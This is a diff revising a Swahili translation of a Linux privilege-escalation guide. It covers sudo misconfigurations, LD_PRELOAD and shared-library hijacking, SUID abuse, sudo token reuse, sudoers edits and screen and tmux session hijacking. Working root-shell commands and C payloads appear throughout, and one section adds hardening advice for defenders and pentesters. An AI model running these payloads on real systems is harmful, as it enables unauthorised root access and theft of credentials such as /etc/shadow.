#Find all SUID binaries ``` -Baadhi ya **amri zisizotarajiwa zinakuwezesha kusoma na/au kuandika mafaili au hata kutekeleza amri.** Kwa mfano: +Baadhi ya amri **zisizotarajiwa zinakuwezesha kusoma na/au kuandika faili au hata kutekeleza amri.** Kwa mfano: ```bash sudo awk 'BEGIN {system("/bin/sh")}' sudo find /etc -exec sh -i \; @@ -746,31 +744,56 @@ less>! ``` ### NOPASSWD -Usanidi wa sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa ruhusa za mtumiaji mwingine bila kujua nenosiri. +Usanidi wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nywila. ``` $ sudo -l User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/vim ``` -Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ssh key kwenye saraka ya `root` au kwa kuitisha `sh`. +Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ssh key kwenye saraka ya root au kwa kuita `sh`. ``` sudo vim -c '!sh' ``` ### SETENV -Maelekezo haya yanamruhusu mtumiaji **set an environment variable** wakati wa kutekeleza kitu: +Agizo hili linamruhusu mtumiaji **set an environment variable** wakati wa kutekeleza kitu: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` -Mfano huu, **based on HTB machine Admirer**, ulikuwa **dhaifu** kwa **PYTHONPATH hijacking** ili kupakia maktaba yoyote ya python wakati script ikitekelezwa kama root: +Mfano huu, **iliyotegemea HTB machine Admirer**, ulikuwa **nyeti kwa PYTHONPATH hijacking** ili kupakia maktaba yoyote ya python wakati script ikiendeshwa kama root: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` -### Njia za kupita kando za utekelezaji wa Sudo +### BASH_ENV imehifadhiwa kupitia sudo env_keep → shell ya root -**Ruka** kusoma mafaili mengine au tumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ +Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzishwa isiyo ya kiingiliano ya Bash ili kuendesha msimbo wowote kama root unapoitisha amri iliyoruhusiwa. + +- Kwa nini inafanya kazi: Kwa shells zisizo za kiingiliano, Bash inatafsiri `$BASH_ENV` na inasoma (sources) faili hiyo kabla ya kuendesha script lengwa. Sheria nyingi za sudo zinaoruhusu kuendesha script au wrapper ya shell. Ikiwa `BASH_ENV` imehifadhiwa na sudo, faili yako itasomwa kwa haki za root. + +- Mahitaji: +- Sheria ya sudo unayoweza kuitekeleza (lengo lolote linaloitisha `/bin/bash` bila kuingiliana, au script yoyote ya bash). +- `BASH_ENV` imepo katika `env_keep` (angalia kwa `sudo -l`). + +- PoC: +```bash +cat > /dev/shm/shell.sh <<'EOF' +#!/bin/bash +/bin/bash +EOF +chmod +x /dev/shm/shell.sh +BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo # or any permitted script/binary that triggers bash +# You should now have a root shell +``` +- Kuimarisha: +- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, tumia `env_reset`. +- Epuka shell wrappers kwa amri zilizo-ruhusiwa na sudo; tumia binaries ndogo. +- Fikiria sudo I/O logging na alerting wakati env vars zilizohifadhiwa zinapotumiwa. + +### Njia za kupita kizuizi za utekelezaji wa sudo + +**Ruka** kusoma faili nyingine au tumia **symlinks**. Kwa mfano kwenye faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less @@ -780,46 +803,46 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` -Ikiwa **wildcard** imetumika (\*), ni rahisi zaidi: +Ikiwa **wildcard** inapotumiwa (\*), ni rahisi zaidi: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` **Hatua za kuzuia**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) -### Sudo command/SUID binary bila kuainisha path ya amri +### Sudo command/SUID binary bila kutaja njia ya amri -Ikiwa **sudo permission** imetolewa kwa amri moja tu **bila kuainisha path**: _hacker10 ALL= (root) less_ unaweza exploit kwa kubadilisha PATH variable +Ikiwa **sudo permission** imetolewa kwa amri moja tu **bila kubainisha njia**: _hacker10 ALL= (root) less_ unaweza kuiexploit kwa kubadilisha PATH variable ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` -Mbinu hii inaweza pia kutumika ikiwa **suid** binary **inatekeleza amri nyingine bila kubainisha njia yake (daima angalia na** _**strings**_ **yaliyomo ya SUID binary isiyo ya kawaida)**. +Mbinu hii pia inaweza kutumika ikiwa **suid** binary **inatekeleza amri nyingine bila kubainisha njia yake (daima angalia kwa** _**strings**_ **yaliyomo ya SUID binary isiyo ya kawaida)**. [Payload examples to execute.](payloads-to-execute.md) -### SUID binary na njia ya amri +### SUID binary yenye njia ya amri -Ikiwa **suid** binary **inatekeleza amri nyingine kwa kubainisha njia**, basi unaweza kujaribu **export a function** yenye jina la amri ambayo faili ya suid inaiita. +Ikiwa **suid** binary **inatekeleza amri nyingine kwa kubainisha njia**, basi unaweza kujaribu **export a function** iliyopewa jina la amri ambayo faili ya suid inaiita. -Kwa mfano, ikiwa **suid** binary inaaita _**/usr/sbin/service apache2 start**_ unalazimika kujaribu kuunda function na kui-export: +Kwa mfano, ikiwa **suid** binary inaita _**/usr/sbin/service apache2 start**_ unapaswa kujaribu kuunda function hiyo na **export it**: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` -Kisha, unapomuita suid binary, kazi hii itaendeshwa +Kisha, unapoitisha suid binary, kazi hii itaendeshwa ### LD_PRELOAD & **LD_LIBRARY_PATH** -The **LD_PRELOAD** environment variable inatumiwa kubainisha maktaba moja au zaidi za kushirikiwa (.so files) ambazo loader itapakia kabla ya zote nyingine, ikiwemo standard C library (`libc.so`). Mchakato huu unajulikana kama ku-preload maktaba. +Variable ya mazingira **LD_PRELOAD** inatumika kutaja moja au zaidi ya maktaba za pamoja (.so files) ambazo zitaingizwa na loader kabla ya nyingine zote, ikiwa ni pamoja na maktaba ya kawaida ya C (`libc.so`). Mchakato huu unajulikana kama preloading a library. -Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa kwa executables za **suid/sgid**, mfumo unaweka masharti yafuatayo: +Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa kwa **suid/sgid** executables, mfumo unaweka masharti fulani: -- Loader haizingatii **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haitalingana na effective user ID (_euid_). -- Kwa executables zenye suid/sgid, maktaba zinazopakiwa awali ni zile tu zilizomo katika paths za kawaida ambazo pia ni suid/sgid. +- Loader haitii **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haifanana na effective user ID (_euid_). +- Kwa executables zenye suid/sgid, maktaba tu katika njia za kawaida ambazo pia ni suid/sgid ndizo zinazo preloaded. -Privilege escalation inaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa `sudo` na matokeo ya `sudo -l` yanajumuisha kauli **env_keep+=LD_PRELOAD**. Mipangilio hii inaruhusu environment variable **LD_PRELOAD** kudumu na kutambulika hata wakati amri zinaendeshwa kwa `sudo`, jambo ambalo linaweza kusababisha utekelezwaji wa arbitrary code kwa vigezo vilivyoongezwa vya ruhusa. +Privilege escalation inaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa `sudo` na pato la `sudo -l` linajumuisha kauli **env_keep+=LD_PRELOAD**. Mpangilio huu unaruhusu variable ya mazingira **LD_PRELOAD** kuendelea kuwepo na kutambuliwa hata wakati amri zinaendeshwa kwa `sudo`, na hivyo kuweza kusababisha utekelezaji wa arbitrary code kwa ruhusa zilizoinuliwa. ``` Defaults env_keep += LD_PRELOAD ``` @@ -836,17 +859,17 @@ setuid(0); system("/bin/bash"); } ``` -Kisha **compile it** ukitumia: +Kisha **kompaila** kwa kutumia: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` -Hatimaye, **escalate privileges** kwa kuendesha +Hatimaye, **escalate privileges** inapokimbizwa ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` > [!CAUTION] -> Privesc inayofanana inaweza kutumika vibaya ikiwa mshambuliaji anadhibiti env variable **LD_LIBRARY_PATH** kwa sababu anadhibiti njia ambako maktaba zitatafutwa. +> Privesc inayofanana inaweza kutumika vibaya ikiwa mshambuliaji anadhibiti env variable **LD_LIBRARY_PATH**, kwa sababu anadhibiti njia ambapo maktaba zitatafutwa. ```c #include #include @@ -868,13 +891,13 @@ sudo LD_LIBRARY_PATH=/tmp ``` ### SUID Binary – .so injection -Ukikutana na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni desturi nzuri kuthibitisha ikiwa inapakia faili za **.so** ipasavyo. Hii inaweza kukaguliwa kwa kuendesha amri ifuatayo: +Unapokutana na binary yenye **SUID** permissions ambayo inaonekana isiyo ya kawaida, ni desturi nzuri kuthibitisha ikiwa inapakia faili za **.so** ipasavyo. Hii inaweza kuangaliwa kwa kukimbiza amri ifuatayo: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` -Kwa mfano, kukutana na hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunaonyesha uwezekano wa utumiaji wa udhaifu. +Kwa mfano, kukutana na hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunaonyesha uwezekano wa exploitation. -Ili kutumia hili, mtu angeendelea kwa kuunda C file, sema _"/path/to/.config/libcalc.c"_, yenye msimbo ufuatao: +Ili exploit hili, mtu angeendelea kwa kuunda faili ya C, kwa mfano _"/path/to/.config/libcalc.c"_, iliyo na msimbo ufuatao: ```c #include #include @@ -885,13 +908,13 @@ void inject(){ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` -Msimbo huu, mara utakapokusanywa na kutekelezwa, unalenga kuinua vibali kwa kubadili ruhusa za faili na kuendesha shell yenye vibali vilivyoongezeka. +Msimbo huu, mara utakapo compiled na executed, unalenga kuinua vibali kwa kubadilisha ruhusa za faili na kutekeleza shell yenye vibali vilivyoongezwa. -Kusanya faili ya C iliyotajwa hapo juu kuwa shared object (.so) kwa kutumia: +Compile faili ya C iliyotajwa hapo juu kuwa shared object (.so) kwa kutumia: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` -Mwishowe, kuendesha binary ya SUID iliyothiriwa kunapaswa kuchochea exploit, na hivyo kuruhusu uvunjaji wa mfumo uwezekane. +Mwishowe, kuendesha SUID binary iliyothiriwa kunapaswa kuchochea exploit, na hivyo kuwezesha kuvunjwa kwa usalama wa mfumo. ## Shared Object Hijacking ```bash @@ -903,7 +926,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` -Sasa tumepata SUID binary inayopakia library kutoka kwenye folda ambapo tunaweza kuandika, hebu tuunde library katika folda hiyo kwa jina linalohitajika: +Sasa kwa kuwa tumepata SUID binary inayopakia library kutoka kwa folder tunaoweza kuandika, tutengeneze library katika folder hiyo kwa jina linalohitajika: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include @@ -916,17 +939,17 @@ setresuid(0,0,0); system("/bin/bash -p"); } ``` -Ikiwa unapokea kosa kama +Ikiwa unapata kosa kama ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` -hii ina maana kwamba maktaba uliyoiunda inapaswa kuwa na function inayoitwa `a_function_name`. +hii inamaanisha kuwa maktaba uliyoiunda inapaswa kuwa na function iitwayo `a_function_name`. ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyopangwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji kuvuka vikwazo vya usalama vya ndani. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa matukio ambapo unaweza **kuingiza hoja tu** katika amri. +[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumika na mshambuliaji kupita vikwazo vya usalama vya ndani. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa matukio ambapo unaweza **kuingiza vigezo tu** katika amri. -Mradi unaokusanya legitimate functions za Unix binaries ambazo zinaweza kutumiwa vibaya kuondoka katika restricted shells, escalate au maintain elevated privileges, transfer files, spawn bind na reverse shells, na kurahisisha kazi nyingine za post-exploitation. +Mradi unakusanya kazi halali za Unix binaries ambazo zinaweza kutumiwa vibaya kuondoka kwenye restricted shells, kuinua au kudumisha idhini zilizoinuliwa, kuhamisha faili, kuanzisha bind and reverse shells, na kurahisisha kazi nyingine za post-exploitation. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ @@ -945,55 +968,55 @@ https://gtfoargs.github.io/ ### FallOfSudo -Ikiwa unaweza kufikia `sudo -l` unaweza kutumia zana [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) ili kuangalia kama inapata jinsi ya ku-exploit sheria yoyote ya sudo. +Ikiwa unaweza kufikia `sudo -l` unaweza kutumia zana [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) kukagua kama inapata njia ya kutumia sheria yoyote ya sudo. ### Reusing Sudo Tokens -Katika matukio ambapo una **sudo access** lakini huna password, unaweza escalate privileges kwa **kusubiri utekelezaji wa amri ya sudo kisha hijack session token**. +Katika matukio ambapo una **sudo access** lakini sio nywila, unaweza kuinua idhini kwa **kusubiri utekelezaji wa amri ya sudo kisha kunyakua token ya kikao**. -Mahitaji ya escalate privileges: +Mahitaji ya kuinua idhini: -- Tayari una shell kama user "_sampleuser_" -- "_sampleuser_" amekuwa **akitumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa default hapo ndio muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza password) +- Tayari una shell kama mtumiaji "_sampleuser_" +- "_sampleuser_" ame**tumias `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa chaguo-msingi hilo ndilo muda wa sudo token linaloturuhusu kutumia `sudo` bila kuingiza nywila) - `cat /proc/sys/kernel/yama/ptrace_scope` ni 0 -- `gdb` inapatikana (unaweza kui-pakiwa) +- `gdb` inapatikana (unaweza kuweza kuipakia) -(Unaweza kwa muda kuwezesha `ptrace_scope` kwa kutumia `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) +(Unaweza kuanzisha kwa muda `ptrace_scope` na `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kwa kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) -Kama mahitaji haya yote yametimizwa, **unaweza escalate privileges kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) +Ikiwa mahitaji haya yote yamekidhiwa, **unaweza kuinua idhini kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) -- The **first exploit** (`exploit.sh`) itaunda binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuactivate sudo token katika session yako** (hutaapata moja kwa moja root shell, fanya `sudo su`): +- **Exploit ya kwanza** (`exploit.sh`) itaumba binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha sudo token katika kikao chako** (huutapewa moja kwa moja shell ya root, fanya `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` -- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inayomilikiwa na root yenye setuid** +- **exploit ya pili** (`exploit_v2.sh`) itaunda shell ya sh katika _/tmp_ **inamilikiwa na root na ikiwa na setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` -- **exploit ya tatu** (`exploit_v3.sh`) **itaunda sudoers file** ambayo inafanya **sudo tokens kuwa ya milele na kuruhusu watumiaji wote kutumia sudo** +- **exploit ya tatu** (`exploit_v3.sh`) **itaunda sudoers file** ambayo inafanya **sudo tokens kuwa za kudumu na inaruhusu watumiaji wote kutumia sudo** ```bash bash exploit_v3.sh sudo su ``` ### /var/run/sudo/ts/\ -Ikiwa una **write permissions** kwenye folda au kwenye yoyote ya faili zilizoundwa ndani ya folda unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ku**unda sudo token kwa user na PID**.\ -Kwa mfano, ikiwa unaweza ku-overwrite faili _/var/run/sudo/ts/sampleuser_ na una shell kama user huyo mwenye PID 1234, unaweza **obtain sudo privileges** bila kuhitaji kujua password kwa kufanya: +Ikiwa una **idhinisho la kuandika** kwenye folda au kwenye faili yoyote iliyotengenezwa ndani ya folda unaweza kutumia bainari [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ku **unda token ya sudo kwa mtumiaji na PID**.\ +Kwa mfano, ikiwa unaweza kuandika juu ya faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata ruhusa za sudo** bila kuhitaji kujua nenosiri kwa kufanya: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` ### /etc/sudoers, /etc/sudoers.d -The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **by default can only be read by user root and group root**.\ -**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utakuwa na uwezo wa **escalate privileges**. +Faili `/etc/sudoers` na faili zilizo ndani ya `/etc/sudoers.d` zinaweka ni nani anaweza kutumia `sudo` na jinsi inavyofanya kazi. Faili hizi **kwa chaguo-msingi zinaweza kusomwa tu na user root na group root**.\ +**Kama** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata baadhi ya taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **escalate privileges** ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` -Ikiwa unaweza kuandika unaweza kutumia vibaya ruhusa hii +Ikiwa unaweza kuandika, unaweza kuitumia vibaya ruhusa hii ```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README @@ -1007,15 +1030,15 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` ### DOAS -Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD; kumbuka kuangalia usanidi wake katika `/etc/doas.conf` +Kuna baadhi ya mbadala ya binary ya `sudo` kama `doas` kwa OpenBSD; kumbuka kuangalia usanidi wake katika `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` ### Sudo Hijacking -Ikiwa unajua kwamba **mtumiaji kawaida hujiunga kwenye mashine na hutumia `sudo`** kuinua vibali na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kuunda executable mpya ya sudo** ambayo itaendesha code yako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati mtumiaji anatekeleza sudo, executable yako ya sudo itatekelezwa. +Ikiwa unajua kwamba **user kawaida huungana kwenye machine na hutumia `sudo`** ili escalate privileges na umepata shell ndani ya muktadha wa user, unaweza **kuunda executable mpya ya sudo** ambayo itatekeleza code yako kama root kisha itatekeleza amri ya user. Kisha, **badilisha $PATH** ya muktadha wa user (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati user atakapotekeleza sudo, executable yako ya sudo itatekelezwa. -Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano [sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) +Kumbuka kwamba ikiwa user anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) modifies `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. You can find another example in [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) Au kuendesha kitu kama: ```bash @@ -1036,11 +1059,11 @@ sudo ls ### ld.so -Faili `/etc/ld.so.conf` inaonyesha **wapi faili za usanidi zinazopakiwa zipo**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf` +Faili `/etc/ld.so.conf` inaonyesha **wapi faili za usanidi zilizopakiwa zinatoka**. Kwa kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf` -Hii inamaanisha kwamba faili za usanidi kutoka `/etc/ld.so.conf.d/*.conf` zitasomwa. Faili hizi za usanidi zinaonyesha **folda nyingine** ambapo **libraries** zitatafutwa. Kwa mfano, yaliyomo katika `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii inamaanisha kwamba mfumo utafuta libraries ndani ya `/usr/local/lib`**. +Hii inamaanisha kwamba faili za usanidi zilizo katika `/etc/ld.so.conf.d/*.conf` zitasomwa. Faili hizi za usanidi zinaonyesha **folda nyingine** ambako **maktaba** zitatafutwa. Kwa mfano, yaliyomo katika `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii ina maana kwamba mfumo utatafuta maktaba ndani ya `/usr/local/lib`**. -Ikiwa kwa sababu fulani **mtumiaji ana ruhusa za kuandika** kwenye mojawapo ya njia zilizoonyeshwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au folda yoyote ndani ya faili ya usanidi iliyotajwa katika `/etc/ld.so.conf.d/*.conf` anaweza kufanikiwa kuinua ruhusa.\ +Iwapo kwa sababu fulani **mtumiaji ana ruhusa ya kuandika** kwenye mojawapo ya njia zilizoonyeshwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au folda yoyote iliyotajwa ndani ya faili za usanidi `/etc/ld.so.conf.d/*.conf` anaweza kuwa na uwezo wa kuinua ruhusa.\ Angalia **how to exploit this misconfiguration** kwenye ukurasa ufuatao: @@ -1059,7 +1082,7 @@ linux-gate.so.1 => (0x0068c000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x005bb000) ``` -Kwa kunakili lib katika `/var/tmp/flag15/` itatumiwa na programu mahali hapa kama ilivyoainishwa katika kigezo cha `RPATH`. +Kwa kunakili lib ndani ya `/var/tmp/flag15/`, itatumika na programu hapa kama ilivyoainishwa katika kigezo cha `RPATH`. ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ @@ -1068,7 +1091,7 @@ linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` -Kisha tengeneza maktaba hasidi katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` +Kisha tengeneza maktaba ya uovu katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" @@ -1081,40 +1104,40 @@ setresuid(geteuid(),geteuid(), geteuid()); execve(file,argv,0); } ``` -## Uwezo +## Capabilities -Linux capabilities provide a **subset of the available root privileges to a process**. Hii kwa ufanisi inavunja **privileges za root kuwa vitengo vidogo na vinavyotofautiana**. Kila kimoja cha vitengo hivi kinaweza kisha kupewa kwa miamala kwa uhuru. Kwa njia hii seti kamili ya privileges inapunguzwa, kupunguza hatari za exploitation.\ -Read the following page to **learn more about capabilities and how to abuse them**: +Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ +Soma ukurasa ufuatao ili **kujifunza zaidi kuhusu capabilities na jinsi ya kuvitumia vibaya**: {{#ref}} linux-capabilities.md {{#endref}} -## Ruhusa za saraka +## Directory permissions -Katika saraka, the **bit for "execute"** ina maana kuwa mtumiaji aliyeathirika anaweza "**cd**" ndani ya folda.\ -The **"read"** bit ina maana mtumiaji anaweza **kuorodhesha** the **files**, na the **"write"** bit ina maana mtumiaji anaweza **kufuta** na **kuunda** **files** mpya. +Katika directory, the **bit for "execute"** ina maana kwamba mtumiaji anayehusika anaweza "**cd**" into the folder.\ +The **"read"** bit ina maana mtumiaji anaweza **list** the **files**, na the **"write"** bit ina maana mtumiaji anaweza **delete** na **create** new **files**. ## ACLs -Access Control Lists (ACLs) zinawakilisha tabaka la pili la ruhusa za kutegemea hiari, zenye uwezo wa **overriding the traditional ugo/rwx permissions**. Ruhusa hizi zinaongeza udhibiti wa upatikanaji wa faili au saraka kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kundi. Kiwango hiki cha **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). +Access Control Lists (ACLs) zinawakilisha safu ya pili ya ruhusa za hiari, zenye uwezo wa **overriding the traditional ugo/rwx permissions**. Ruhusa hizi zinaongeza udhibiti juu ya upatikanaji wa file au directory kwa kuruhusu au kukataa haki kwa users maalum ambao si wamiliki au sehemu ya group. Kiwango hiki cha **granularity ensures more precise access management**. Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). -**Mpa** mtumiaji "kali" read and write permissions over a file: +**Mpe** user "kali" read and write permissions over a file: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` -**Pata** faili zenye ACLs maalum kutoka kwenye mfumo: +**Pata** faili zenye ACL maalum kutoka kwenye mfumo: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` ## Fungua shell sessions -Katika **matoleo ya zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji mwingine (**root**).\ -Katika **matoleo mapya zaidi** utaweza tu **connect** kwenye screen sessions za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. +Katika **old versions** unaweza **hijack** baadhi ya **shell** session ya mtumiaji mwingine (**root**).\ +Katika **newest versions** utaweza **connect** tu kwenye screen sessions za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. ### screen sessions hijacking @@ -1125,7 +1148,7 @@ screen -ls / # Show another user' screen sessions ``` ![](<../../images/image (141).png>) -**Unganisha kwenye session** +**Unganisha kwenye kikao** ```bash screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image @@ -1133,11 +1156,9 @@ screen -x [user]/[session id] ``` ## tmux sessions hijacking -Hii ilikuwa tatizo kwa **old tmux versions**. +Hii ilikuwa tatizo na **old tmux versions**. Sikuweza hijack kikao cha tmux (v2.1) kilichoundwa na root kama mtumiaji asiye na ruhusa. -Sikuweza ku-hijack kikao cha tmux (v2.1) kilichoundwa na root nikiwa non-privileged user. - -**Orodhesha vikao vya tmux** +**Orodhesha sesheni za tmux** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets @@ -1145,7 +1166,7 @@ tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session i ``` ![](<../../images/image (837).png>) -**Unganisha kwenye session** +**Unganisha kwenye kikao** ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself @@ -1161,27 +1182,27 @@ Check **Valentine box from HTB** kwa mfano. ### Debian OpenSSL Predictable PRNG - CVE-2008-0166 -Funguo zote za SSL na SSH zilizotengenezwa kwenye mifumo inayotegemea Debian (Ubuntu, Kubuntu, etc) kati ya Septemba 2006 na Mei 13, 2008 zinaweza kuathiriwa na hitilafu hii.\ -Hitilafu hii ilitokana wakati wa kuunda ufunguo mpya wa ssh kwenye OS hizo, kwani **tofauti 32,768 tu zilikuwa zinazowezekana**. Hii ina maana kwamba uwezekano wote unaweza kuhesabiwa na **ukiwa na ufunguo wa umma wa ssh unaweza kutafuta ufunguo binafsi unaolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +Vifunguo vyote vya SSL na SSH vilivyotengenezwa kwenye mifumo inayotegemea Debian (Ubuntu, 